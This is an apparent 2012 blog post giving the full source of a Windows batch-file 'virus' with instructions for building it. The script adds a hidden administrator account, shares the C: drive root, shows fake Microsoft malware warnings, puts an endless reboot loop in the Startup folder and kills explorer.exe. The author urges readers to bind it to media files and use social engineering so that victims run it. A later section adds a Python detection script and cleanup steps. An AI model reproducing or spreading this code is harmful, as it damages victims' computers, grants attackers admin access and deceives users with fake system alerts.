Thursday, December 13, 2012

Batch File Virus -4

@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat

“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem

***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code, paste it into Notepad, and save it with the .bat extension. The script starts in C:\windows\system32, where it creates a new directory named '1001'. It then changes the time to 12:00 and the date to 01-01-2000, and creates a new user account named 'Microsoft_support' with the password 'support'.

It automatically assigns administrator rights to the account it created, then shares the root of drive 'C:', which is a serious security issue that leaves the system completely exposed. It creates a VBScript file named 'warnusr.vbs' that displays the message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus', which appears to come from the operating system itself, and then changes the keyboard settings (rate and delay). Since the virus has already modified the time and date, it automatically pops up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02; if the user restarts the computer, then it's gone.

Whenever the user tries to log in, the computer reboots continuously, because the 'shutdown -r' command is set with a time of 00 and kept in the start-up folder. The user can do nothing to stop this except enter safe mode and delete the file; moreover, the file is set with the system and hidden attributes, making it invisible.

The only way to stop this is to enter safe mode, disable the start-up items, and then delete the files that reside in C:\windows\system32\1001 and in the start-up folder.
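Every step of this script is an ordinary Windows command, so its behaviour can be recognised from command lines alone. The following is an added example, not part of the original post: a small Python triage that flags the behaviours described above in the lines of a batch file or a process command-line log. The rule names, the severity thresholds and the benign sample lines are assumptions made for illustration.

```python
import re

# Behaviours described in the post, as case-insensitive command-line patterns.
RULES = {
    "local_account_created": r"\bnet1?(\.exe)?\s+users?\s+\S+.*\s/add\b",
    "added_to_administrators": r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+.*/add\b",
    "drive_root_shared": r"\bnet1?(\.exe)?\s+share\s+\S+=[a-z]:\\?(\s|$)",
    "hidden_system_attrib": r"\battrib(\.exe)?\s+(?=.*\+h)(?=.*\+s)",
    "immediate_reboot": r"\bshutdown(\.exe)?\s+.*[-/]r\b.*[-/]t\s+0+\b",
    "explorer_killed": r"\btaskkill(\.exe)?\s+.*/im\s+explorer\.exe",
    "interactive_at_job": r"\bat(\.exe)?\s+\d{1,2}:\d{2}\s+/interactive\b",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in RULES.items()}

def triage(lines):
    """Map rule name -> matching lines, ignoring blank lines and rem comments."""
    hits = {}
    for raw in lines:
        line = raw.strip().lstrip("@")
        if not line or re.match(r"rem\b", line, re.IGNORECASE):
            continue
        for name, rx in COMPILED.items():
            if rx.search(line):
                hits.setdefault(name, []).append(line)
    return hits

def verdict(hits):
    """Assumed thresholds: a new account made administrator, or 3+ rules, is 'high'."""
    if {"local_account_created", "added_to_administrators"} <= set(hits) or len(hits) >= 3:
        return "high"
    return "review" if hits else "clean"

# Constructed samples: commands quoted from the post, and routine admin usage.
SUSPECT = [
    "@echo off", "rem taskkill /F /IM explorer.exe  (comment, skipped)",
    "net users Microsoft_support support /add",
    "net localgroup administrators Microsoft_support /add",
    r"net share system=C:\ /UNLIMITED", "attrib +h +s +r sd.bat",
    r'at 12:01 /interactive "%SystemRoot%\system32\1001\warnusr.vbs"',
    "taskkill /F /IM explorer.exe", "shutdown -r -t 00",
]
BENIGN = ["net user", r"net share docs=C:\Users\Public\Docs", "attrib +r notes.txt",
          "shutdown -r -t 60", "taskkill /F /IM notepad.exe"]

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        found = triage(sample)
        print(label, verdict(found), sorted(found))
```

Deleting the files does not undo the script's other changes: the 'Microsoft_support' account, its membership of the administrators group and the 'system' share of C:\ remain until they are removed.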

You can also use some exe-binders to bind this virus with any audio, video, text or whatever the files may be, then use some social engineering technique to make the victim execute the file by himself to harm his/her computer.

You can create this virus without using any third-party tools in Windows; instead of an exe-binder, you can also use the 'iexpress' wizard to create a custom package.
